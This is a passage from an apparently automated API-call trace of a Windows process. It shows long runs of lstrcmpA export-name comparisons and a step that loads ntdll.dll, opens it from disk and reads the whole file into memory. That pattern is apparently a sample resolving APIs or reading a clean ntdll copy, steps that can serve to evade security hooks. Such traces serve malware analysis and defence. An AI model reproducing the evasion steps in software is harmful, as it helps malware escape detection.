(lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshal64") returned 1 [0141.221] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLIPFORMAT_UserUnmarshalExt") returned 1 [0141.221] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromOle1Class") returned 1 [0141.221] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgID") returned 1 [0141.221] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromProgIDEx") returned 1 [0141.221] lstrcmpA (lpString1="CoBuildVersion", lpString2="CLSIDFromString") returned 1 [0141.221] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Connect") returned -1 [0141.221] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Disconnect") returned -1 [0141.221] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer2_Release") returned -1 [0141.221] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_AddRef") returned -1 [0141.221] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Connect") returned -1 [0141.221] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Disconnect") returned -1 [0141.221] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Invoke") returned -1 [0141.221] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_QueryInterface") returned -1 [0141.221] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdAsyncStubBuffer_Release") returned -1 [0141.221] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Connect") returned -1 [0141.221] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_CountRefs") returned -1 [0141.221] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_Disconnect") returned -1 [0141.221] lstrcmpA (lpString1="CoBuildVersion", lpString2="CStdStubBuffer2_QueryInterface") returned -1 [0141.221] lstrcmpA (lpString1="CoBuildVersion", lpString2="CheckInitDde") returned 1 [0141.237] GetProcessHeap () returned 0x520000 [0141.237] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x4123040 | out: hHeap=0x520000) returned 1 [0141.242] GetProcessHeap () returned 0x520000 [0141.243] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x539740 [0141.243] LoadLibraryA (lpLibFileName="Ntdll.dll") returned 0x7ffc5f810000 [0141.243] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0141.243] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0141.244] GetModuleFileNameA (in: hModule=0x7ffc5f810000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")) returned 0x1d [0141.244] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0141.244] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0141.244] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0141.245] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1817160) returned 1 [0141.245] GetProcessHeap () returned 0x520000 [0141.245] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x1bba48) returned 0x412a040 [0141.248] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0141.248] ReadFile (in: hFile=0x140, lpBuffer=0x412a040, nNumberOfBytesToRead=0x1bba48, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x412a040*, lpNumberOfBytesRead=0x14f5a4*=0x1bba48, lpOverlapped=0x0) returned 1 [0141.764] CloseHandle (hObject=0x140) returned 1 [0141.764] lstrcmpA (lpString1="A_SHAFinal", lpString2="A_SHAFinal") returned 0 [0141.764] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAFinal") returned 1 [0141.765] lstrcmpA (lpString1="A_SHAInit", lpString2="A_SHAInit") returned 0 [0141.765] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAFinal") returned 1 [0141.765] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAInit") returned 1 [0141.765] lstrcmpA (lpString1="A_SHAUpdate", lpString2="A_SHAUpdate") returned 0 [0141.765] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAFinal") returned 1 [0141.765] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAInit") returned 1 [0141.765] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="A_SHAUpdate") returned 1 [0141.765] lstrcmpA (lpString1="AlpcAdjustCompletionListConcurrencyCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 0 [0141.765] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAFinal") returned 1 [0141.765] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAInit") returned 1 [0141.765] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="A_SHAUpdate") returned 1 [0141.765] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0141.765] lstrcmpA (lpString1="AlpcFreeCompletionListMessage", lpString2="AlpcFreeCompletionListMessage") returned 0 [0141.765] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAFinal") returned 1 [0141.765] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAInit") returned 1 [0141.765] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="A_SHAUpdate") returned 1 [0141.765] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0141.765] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcFreeCompletionListMessage") returned 1 [0141.765] lstrcmpA (lpString1="AlpcGetCompletionListLastMessageInformation", lpString2="AlpcGetCompletionListLastMessageInformation") returned 0 [0141.766] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAFinal") returned 1 [0141.766] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAInit") returned 1 [0141.766] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="A_SHAUpdate") returned 1 [0141.766] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0141.766] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcFreeCompletionListMessage") returned 1 [0141.766] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0141.766] lstrcmpA (lpString1="AlpcGetCompletionListMessageAttributes", lpString2="AlpcGetCompletionListMessageAttributes") returned 0 [0141.766] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAFinal") returned 1 [0141.766] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAInit") returned 1 [0141.766] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="A_SHAUpdate") returned 1 [0141.766] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0141.766] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcFreeCompletionListMessage") returned 1 [0141.766] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0141.766] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0141.766] lstrcmpA (lpString1="AlpcGetHeaderSize", lpString2="AlpcGetHeaderSize") returned 0 [0141.766] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAFinal") returned 1 [0141.766] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAInit") returned 1 [0141.766] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0141.766] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0141.766] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0141.766] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0141.766] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0141.766] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0141.766] lstrcmpA (lpString1="AlpcGetMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 0 [0141.766] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAFinal") returned 1 [0141.766] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAInit") returned 1 [0141.766] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="A_SHAUpdate") returned 1 [0141.766] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0141.767] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0141.767] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0141.767] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0141.767] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0141.767] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0141.767] lstrcmpA (lpString1="AlpcGetMessageFromCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 0 [0141.767] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAFinal") returned 1 [0141.767] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAInit") returned 1 [0141.767] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="A_SHAUpdate") returned 1 [0141.767] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0141.767] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcFreeCompletionListMessage") returned 1 [0141.767] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0141.767] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0141.767] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetHeaderSize") returned 1 [0141.767] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageAttribute") returned 1 [0141.767] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0141.767] lstrcmpA (lpString1="AlpcGetOutstandingCompletionListMessageCount", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 0 [0141.767] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAFinal") returned 1 [0141.767] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAInit") returned 1 [0141.767] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="A_SHAUpdate") returned 1 [0141.767] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0141.767] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcFreeCompletionListMessage") returned 1 [0141.767] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0141.767] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0141.767] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetHeaderSize") returned 1 [0141.767] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageAttribute") returned 1 [0141.767] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0141.767] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0141.768] lstrcmpA (lpString1="AlpcInitializeMessageAttribute", lpString2="AlpcInitializeMessageAttribute") returned 0 [0141.768] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAFinal") returned 1 [0141.768] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAInit") returned 1 [0141.768] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="A_SHAUpdate") returned 1 [0141.768] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0141.768] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcFreeCompletionListMessage") returned 1 [0141.768] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0141.768] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0141.768] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetHeaderSize") returned 1 [0141.768] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageAttribute") returned 1 [0141.768] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0141.768] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0141.768] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcInitializeMessageAttribute") returned 1 [0141.768] lstrcmpA (lpString1="AlpcMaxAllowedMessageLength", lpString2="AlpcMaxAllowedMessageLength") returned 0 [0141.768] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAFinal") returned 1 [0141.768] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAInit") returned 1 [0141.768] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0141.768] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0141.768] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0141.768] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0141.768] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0141.768] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0141.768] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0141.769] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0141.769] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0141.769] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0141.769] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0141.769] lstrcmpA (lpString1="AlpcRegisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 0 [0141.769] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0141.769] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0141.769] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0141.769] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0141.769] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0141.769] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0141.769] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0141.769] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0141.769] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0141.769] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0141.769] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0141.769] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0141.769] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0141.769] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0141.769] lstrcmpA (lpString1="AlpcRegisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 0 [0141.769] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAFinal") returned 1 [0141.769] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAInit") returned 1 [0141.769] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="A_SHAUpdate") returned 1 [0141.769] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0141.769] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0141.769] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0141.769] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0141.769] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0141.770] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0141.770] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0141.770] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0141.770] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0141.770] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0141.770] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0141.770] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0141.770] lstrcmpA (lpString1="AlpcRundownCompletionList", lpString2="AlpcRundownCompletionList") returned 0 [0141.770] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAFinal") returned 1 [0141.770] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAInit") returned 1 [0141.770] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="A_SHAUpdate") returned 1 [0141.770] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0141.770] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcFreeCompletionListMessage") returned 1 [0141.770] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0141.770] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0141.770] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetHeaderSize") returned 1 [0141.770] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageAttribute") returned 1 [0141.770] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0141.770] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0141.770] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcInitializeMessageAttribute") returned 1 [0141.770] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0141.770] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionList") returned 1 [0141.770] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0141.770] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcRundownCompletionList") returned 1 [0141.770] lstrcmpA (lpString1="AlpcUnregisterCompletionList", lpString2="AlpcUnregisterCompletionList") returned 0 [0141.771] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAFinal") returned 1 [0141.771] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAInit") returned 1 [0141.771] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="A_SHAUpdate") returned 1 [0141.771] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0141.771] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcFreeCompletionListMessage") returned 1 [0141.771] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0141.771] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0141.771] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetHeaderSize") returned 1 [0141.771] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageAttribute") returned 1 [0141.771] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0141.771] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0141.771] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcInitializeMessageAttribute") returned 1 [0141.771] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0141.771] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionList") returned 1 [0141.771] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0141.771] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcRundownCompletionList") returned 1 [0141.771] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionList") returned 1 [0141.771] lstrcmpA (lpString1="AlpcUnregisterCompletionListWorkerThread", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 0 [0141.771] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAFinal") returned 1 [0141.771] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAInit") returned 1 [0141.771] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="A_SHAUpdate") returned 1 [0141.771] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0141.771] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcFreeCompletionListMessage") returned 1 [0141.771] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0141.771] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0141.771] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetHeaderSize") returned 1 [0141.771] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageAttribute") returned 1 [0141.772] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0141.772] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0141.772] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcInitializeMessageAttribute") returned 1 [0141.772] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0141.772] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionList") returned 1 [0141.772] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0141.772] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcRundownCompletionList") returned 1 [0141.772] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionList") returned 1 [0141.772] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0141.772] lstrcmpA (lpString1="ApiSetQueryApiSetPresence", lpString2="ApiSetQueryApiSetPresence") returned 0 [0141.772] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAFinal") returned 1 [0141.772] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAInit") returned 1 [0141.772] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="A_SHAUpdate") returned 1 [0141.772] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcAdjustCompletionListConcurrencyCount") returned 1 [0141.772] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcFreeCompletionListMessage") returned 1 [0141.772] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListLastMessageInformation") returned 1 [0141.772] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetCompletionListMessageAttributes") returned 1 [0141.772] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetHeaderSize") returned 1 [0141.772] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageAttribute") returned 1 [0141.772] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetMessageFromCompletionList") returned 1 [0141.772] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcGetOutstandingCompletionListMessageCount") returned 1 [0141.772] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcInitializeMessageAttribute") returned 1 [0141.772] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcMaxAllowedMessageLength") returned 1 [0141.772] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionList") returned 1 [0141.772] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRegisterCompletionListWorkerThread") returned 1 [0141.772] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcRundownCompletionList") returned 1 [0141.772] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionList") returned 1 [0141.772] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="AlpcUnregisterCompletionListWorkerThread") returned 1 [0141.772] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="ApiSetQueryApiSetPresence") returned 1 [0141.773] lstrcmpA (lpString1="CsrAllocateCaptureBuffer", lpString2="CsrAllocateCaptureBuffer") returned 0 [0141.773] lstrcmpA 